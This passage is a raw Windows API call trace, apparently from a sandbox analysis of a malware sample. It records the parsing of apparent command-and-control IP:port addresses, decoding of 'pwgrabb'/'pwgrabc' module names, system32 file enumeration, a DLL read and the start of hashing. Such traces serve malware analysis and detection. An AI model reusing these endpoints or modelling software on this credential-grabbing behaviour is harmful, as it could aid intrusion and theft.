(lpFirst="1.20.170.218:49002", lpSrch=":") returned=":49002" [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ec0 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49930 [0119.460] StrStrIW (lpFirst="49002", lpSrch=":") returned 0x0 [0119.460] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49ec0, Size=0x10) returned 0x32e49fc0 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e80 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b10 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49b10 | out: hHeap=0x2150000) returned 1 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e80 | out: hHeap=0x2150000) returned 1 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49930 | out: hHeap=0x2150000) returned 1 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fc0 | out: hHeap=0x2150000) returned 1 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.460] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e49c90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.460] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e49c90, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=18 | out: lpWideCharStr="88.43.45.194:1998") returned 18 [0119.460] StrStrIW (lpFirst="88.43.45.194:1998", lpSrch=":") returned=":1998" [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49de0 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49bd0 [0119.461] StrStrIW (lpFirst="1998", lpSrch=":") returned 0x0 [0119.461] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49de0, Size=0x10) returned 0x32e49e00 [0119.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e20 [0119.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49720 [0119.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49720 | out: hHeap=0x2150000) returned 1 [0119.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49720 [0119.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e20 | out: hHeap=0x2150000) returned 1 [0119.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49bd0 | out: hHeap=0x2150000) returned 1 [0119.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e00 | out: hHeap=0x2150000) returned 1 [0119.461] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x70) returned 0x32e40730 [0119.461] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49780 [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.461] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.462] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.463] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.464] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.465] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.466] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.467] GetTickCount () returned 0xe87bbf [0119.474] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e41a90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.474] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e497e0 [0119.474] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e41a90, cbMultiByte=-1, lpWideCharStr=0x32e497e0, cchWideChar=8 | out: lpWideCharStr="pwgrabb") returned 8 [0119.475] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e498a0 [0119.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a060 [0119.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49bd0 [0119.479] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e41ab0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49930 [0119.479] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e41ab0, cbMultiByte=-1, lpWideCharStr=0x32e49930, cchWideChar=8 | out: lpWideCharStr="pwgrabc") returned 8 [0119.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49960 [0119.479] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a060, Size=0x10) returned 0x32e4a040 [0119.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e499f0 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b43f10 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b43fb0 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e481d0 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47e70 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48050 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48410 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48320 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47db0 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48440 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48290 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48080 | out: hHeap=0x2150000) returned 1 [0119.479] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e484a0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e482c0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48470 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47d50 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47f90 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47de0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47e40 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e48140 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47ea0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47f00 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e480b0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e47f30 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e480e0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e481a0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e46b50 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49990 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499c0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49cf0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49c90 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a90 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41ab0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41680 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e483e0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41b10 | out: hHeap=0x2150000) returned 1 [0119.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ec0 [0119.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x4b0) returned 0x32e4a140 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e410c0 | out: hHeap=0x2150000) returned 1 [0119.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ec0 | out: hHeap=0x2150000) returned 1 [0119.480] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f60 [0119.480] GetFullPathNameW (in: lpFileName="EN\\", nBufferLength=0x105, lpBuffer=0xce700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\", lpFilePart=0x0) returned 0x17 [0119.480] PathAddBackslashW (in: pszPath="C:\\Windows\\system32\\EN\\" | out: pszPath="C:\\Windows\\system32\\EN\\") returned="" [0119.480] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\EN\\*.*", lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbda8689b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbdaacae9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbdaacae9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x716470 [0119.481] FindNextFileW (in: hFindFile=0x716470, lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbda8689b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbdaacae9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbdaacae9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.481] FindNextFileW (in: hFindFile=0x716470, lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f3b0c4a, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f3b0c4a, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f3b0c4a, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2fb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapIn.Resources.dll", cAlternateFileName="")) returned 1 [0119.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0119.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e42330 [0119.481] FindNextFileW (in: hFindFile=0x716470, lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f38a9f5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f38a9f5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f38a9f5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.Resources.dll", cAlternateFileName="")) returned 1 [0119.481] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49ee0, Size=0x10) returned 0x32e4a020 [0119.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e41af0 [0119.481] FindNextFileW (in: hFindFile=0x716470, lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a1229a8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9a1229a8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9a1229a8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoWorkplace.Resources.dll", cAlternateFileName="")) returned 1 [0119.481] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a020, Size=0x20) returned 0x32e49990 [0119.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e410c0 [0119.481] FindNextFileW (in: hFindFile=0x716470, lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c3db3ca, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9c3db3ca, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9c3db3ca, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fhuxpresentation.Resources.dll", cAlternateFileName="")) returned 1 [0119.481] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49990, Size=0x20) returned 0x32e499c0 [0119.481] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e412e0 [0119.481] FindNextFileW (in: hFindFile=0x716470, lpFindFileData=0xce918 | out: lpFindFileData=0xce918*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c3db3ca, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9c3db3ca, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9c3db3ca, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fhuxpresentation.Resources.dll", cAlternateFileName="")) returned 0 [0119.481] GetLastError () returned 0x12 [0119.481] FindClose (in: hFindFile=0x716470 | out: hFindFile=0x716470) returned 1 [0119.482] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e41d10 [0119.485] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWSnapIn.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwsnapin.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0119.486] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb600 [0119.486] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.486] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2fb600) returned 0x333b3040 [0119.494] ReadFile (in: hFile=0x238, lpBuffer=0x333b3040, nNumberOfBytesToRead=0x2fb600, lpNumberOfBytesRead=0xce724, lpOverlapped=0x0 | out: lpBuffer=0x333b3040*, lpNumberOfBytesRead=0xce724*=0x2fb600, lpOverlapped=0x0) returned 1 [0119.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e4a600 [0119.584] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.584] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, 